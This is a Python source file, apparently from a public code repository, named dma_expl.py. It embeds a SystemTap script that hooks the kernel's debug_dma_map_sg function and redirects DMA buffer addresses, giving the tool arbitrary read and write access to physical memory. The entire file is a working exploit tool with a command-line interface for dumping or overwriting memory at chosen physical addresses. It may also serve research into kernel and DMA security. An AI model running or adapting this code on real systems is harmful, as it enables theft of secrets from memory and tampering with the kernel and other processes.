-
Notifications
You must be signed in to change notification settings - Fork 45
/
Copy pathdma_expl.py
432 lines (271 loc) · 10.1 KB
/
dma_expl.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
import sys, os, traceback, threading, subprocess, signal, time, shutil, struct, mmap
from optparse import OptionParser, make_option
from ctypes import *
# print more information from running SystemTap script
VERBOSE = False
# script source code
SCRIPT_CODE = '''
global data_len = 0
global verbose = ''' + ('1' if VERBOSE else '0') + '''
#
# kernel function probe handler
#
probe kernel.function("debug_dma_map_sg")
{
# parse script arguments passed to stap
phys_addr = strtol(@1, 16);
target_addr = strtol(@2, 16);
printf("%s(%d): %s(): %d\\n", execname(), pid(), probefunc(), $nents);
#
# Each call to sys_write() leads to corresponding call of dma_map_sg(),
# $sg argument contains list of DMA buffers
#
if (verbose != 0)
{
for (i = 0; i < $nents; i++)
{
printf(" #%d (0x%x): 0x%x\\n", i, $sg[i]->length, $sg[i]->dma_address);
}
}
# check for data that came from dma_expl.py os.write() call
if ($nents > 0 && $sg[0]->dma_address == phys_addr)
{
printf("[+] DMA request found, changing address to 0x%x\\n", target_addr + data_len);
# replace addresses of DMA buffers
for (i = 0; i < $nents; i++)
{
$sg[i]->dma_address = target_addr + data_len;
data_len += $sg[i]->length;
}
}
}
'''
SCRIPT_PATH = '/tmp/dma_expl.stp'
TEMP_PATH = '/tmp/dma_expl.tmp'
PAGE_SIZE = 0x1000
class Worker(threading.Thread):
def __init__(self, phys_addr, target_addr):
super(Worker, self).__init__()
self.daemon = True
self.started = True
self.count = 0
# drop script file into the /tmp
self.create_file()
# run SystemTap script
self.p = subprocess.Popen([ 'stap', '-g', '-v', SCRIPT_PATH,
hex(phys_addr), hex(target_addr) ],
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
# wait for script initialization
while self.started:
line = self.p.stderr.readline()
sys.stdout.write(line)
if line == '':
break
# check for pass 5 that indicates sucessfully loaded script
elif line.find('Pass 5') == 0:
print '[+] SystemTap script started'
break
def create_file(self):
# save script contents into the file
with open(SCRIPT_PATH, 'wb') as fd:
fd.write(SCRIPT_CODE)
def run(self):
while self.started:
# read and print script output
line = self.p.stdout.readline()
if VERBOSE:
sys.stdout.write(line)
if line == '':
self.started = False
break
# check for hijacked DMA request
elif line.find('[+]') == 0:
self.count += 1
def start(self):
super(Worker, self).start()
# delay after script start
time.sleep(1)
def stop(self):
if self.started:
# delay before sript shutdown
time.sleep(3)
self.started = False
os.kill(self.p.pid, signal.SIGINT)
class PyObj(Structure):
_fields_ = [("ob_refcnt", c_size_t),
("ob_type", c_void_p)]
class PyVarObj(PyObj):
_fields_ = [("ob_size", c_size_t)]
# ctypes object for introspection
class PyMmap(PyObj):
_fields_ = [("ob_addr", c_size_t)]
# class that inherits mmap.mmap and has the page address
class MyMap(mmap.mmap):
def __init__(self, *args, **kwarg):
# get the page address by introspection of the native structure
m = PyMmap.from_address(id(self))
self.addr = m.ob_addr
class DmaExpl(object):
MAX_IO_SIZE = PAGE_SIZE * 0x1E
def __init__(self, target_addr):
if target_addr & (PAGE_SIZE - 1) != 0:
raise Exception('Address must be aligned by 0x%x' % PAGE_SIZE)
self.phys_addr = 0
self.target_addr = target_addr
self.libc = cdll.LoadLibrary("libc.so.6")
# allocate dummy data buffer
self.buff = MyMap(-1, self.MAX_IO_SIZE, mmap.PROT_WRITE)
self.buff.write('\x41' * self.MAX_IO_SIZE)
print '[+] Memory allocated at 0x%x' % self.buff.addr
with open('/proc/self/pagemap', 'rb') as fd:
# read physical address information
fd.seek(self.buff.addr / PAGE_SIZE * 8)
phys_info = struct.unpack('Q', fd.read(8))[0]
# check that page is mapped and not swapped
if phys_info & (1L << 63) == 0:
raise Exception('Page is not present')
if phys_info & (1L << 62) != 0:
raise Exception('Page is swapped out')
# get physical address from PFN
self.phys_addr = (phys_info & ((1L << 54) - 1)) * PAGE_SIZE
print '[+] Physical address is 0x%x' % self.phys_addr
# run SystemTap script in background thread
self.worker = Worker(self.phys_addr, target_addr)
self.worker.start()
def _dma_read(self, read_size):
count = self.worker.count
print '[+] Reading physical memory 0x%x - 0x%x' % \
(self.target_addr, self.target_addr + read_size - 1)
# O_DIRECT is needed to write our data to disk immediately
fd = os.open(TEMP_PATH, os.O_CREAT | os.O_TRUNC | os.O_RDWR | os.O_DIRECT)
# initiate DMA transaction
if self.libc.write(fd, c_void_p(self.buff.addr), read_size) == -1:
os.close(fd)
raise Exception("write() fails")
os.close(fd)
while self.worker.count == count:
# wait untill intercepted debug_dma_map_sg() call
time.sleep(0.1)
with open(TEMP_PATH, 'rb') as fd:
# get readed data
data = fd.read(read_size)
os.unlink(TEMP_PATH)
self.target_addr += read_size
return data
def read(self, read_size):
data = ''
if read_size < PAGE_SIZE or read_size % PAGE_SIZE != 0:
raise Exception('Invalid read size')
while read_size > 0:
# we can read only MAX_IO_SIZE bytes of physical memory with each os.write() call
size = min(read_size, self.MAX_IO_SIZE)
data += self._dma_read(size)
read_size -= size
print '[+] DONE'
return data
def _dma_write(self, data):
count = self.worker.count
write_size = len(data)
print '[+] Writing physical memory 0x%x - 0x%x' % \
(self.target_addr, self.target_addr + write_size - 1)
with open(TEMP_PATH, 'wb') as fd:
# get readed data
fd.write(data)
# O_DIRECT is needed to write our data to disk immediately
fd = os.open(TEMP_PATH, os.O_RDONLY | os.O_DIRECT)
# initiate DMA transaction
if self.libc.read(fd, c_void_p(self.buff.addr), write_size) == -1:
os.close(fd)
raise Exception("read() fails")
os.close(fd)
while self.worker.count == count:
# wait untill intercepted debug_dma_map_sg() call
time.sleep(0.1)
os.unlink(TEMP_PATH)
self.target_addr += write_size
def write(self, data):
ptr = 0
write_size = len(data)
if write_size < PAGE_SIZE or write_size % PAGE_SIZE != 0:
raise Exception('Invalid write size')
while ptr < write_size:
# we can write only MAX_IO_SIZE bytes of physical memory with each os.read() call
self._dma_write(data[ptr : ptr + self.MAX_IO_SIZE])
ptr += self.MAX_IO_SIZE
print '[+] DONE'
def close(self):
self.worker.stop()
def hexdump(data, width = 16, addr = 0):
ret = ''
def quoted(data):
# replace non-alphanumeric characters
return ''.join(map(lambda b: b if b.isalnum() else '.', data))
while data:
line = data[: width]
data = data[width :]
# put hex values
s = map(lambda b: '%.2x' % ord(b), line)
s += [ ' ' ] * (width - len(line))
# put ASCII values
s = '%s | %s' % (' '.join(s), quoted(line))
if addr is not None:
# put address
s = '%.8x: %s' % (addr, s)
addr += len(line)
ret += s + '\n'
return ret
def main():
option_list = [
make_option('-r', '--read', dest = 'read', default = None,
help = 'read physical memory'),
make_option('-w', '--write', dest = 'write', default = None,
help = 'write physical memory'),
make_option('-s', '--size', dest = 'size', default = None,
help = 'read/write size'),
make_option('-f', '--file', dest = 'file', default = None,
help = 'read/write file path')
]
parser = OptionParser(option_list = option_list)
(options, args) = parser.parse_args()
if options.read is not None:
data = None
addr = int(options.read, 16)
size = int(options.size, 16) if options.size is not None else PAGE_SIZE
elif options.write is not None:
if options.file is None:
print 'ERROR: --file must be specified'
return -1
with open(options.file, 'rb') as fd:
data = fd.read()
addr = int(options.write, 16)
size = len(data)
else:
print 'ERROR: invalid arguments, try --help for help'
return -1
# initialize exploit
expl = DmaExpl(addr)
try:
if options.write is not None:
# perform physical memory writes
expl.write(data)
else:
# perform physical memory reads
data = expl.read(size)
expl.close()
except Exception, e:
expl.close()
raise
if options.read is not None:
if options.file is not None:
# save readed data
with open(options.file, 'wb') as fd:
fd.write(data)
else:
# print readed data
print hexdump(data)
return 0
if __name__ == '__main__':
sys.exit(main())
#
# EoF
#